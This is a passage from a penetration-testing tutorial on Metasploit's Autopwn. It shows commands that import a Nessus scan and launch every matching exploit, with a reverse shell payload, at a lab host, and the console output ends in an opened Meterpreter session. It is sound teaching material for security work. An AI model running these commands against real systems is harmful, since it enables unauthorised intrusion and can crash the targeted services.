Let’s take a quick diversion into exploitation. Metasploit’s Autopwn tool automatically targets and exploits a system using an open port or using the results of a vulnerability scan export. You can use Autopwn to harness the results of most vulnerability scanners, including NeXpose, Nessus, and OpenVAS.
For example, here’s how we could use a Nessus results import to target a system and autopwn it. Create a new database with db_connect and use db_import to import the scan report. In the next example, we run db_autopwn with a series of switches to launch attacks against all targets (-e), show all matching modules (-t), use a reverse shell payload (-r), select exploit modules based on vulnerability (-x), and also select based on open ports (-p). Once db_autopwn launches, Metasploit begins launching exploits at the targets. Successful exploits return a shell to the attacking machine.
msf > db_connect postgres:[email protected]/msf3
msf > db_import /root/nessus.nbe
msf > db_autopwn -e -t -r -x -p
[*] (1/72 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin against 192.168.33.130:1433...
[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.33.130:445...
[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.33.130:445...
. . . SNIP . . .
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:40912 -> 192.168.1.115:15991)
[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...
Based on these scans, Autopwn launched 72 exploits and one was successful, as shown by the opened Meterpreter session in the output above. This exploit gives us full access to the machine through a Meterpreter console, which is discussed in far more depth in Chapter 6.
One big caveat to remember when using Autopwn: If you’re going in with your Autopwn guns blazing, the target system can crash or lose stability. Autopwn has useful features not covered here, such as the ability to select only exploits that have an “Excellent” ranking, meaning it is very unlikely they will crash the remote system or service. For more information on its usage, enter db_autopwn -h.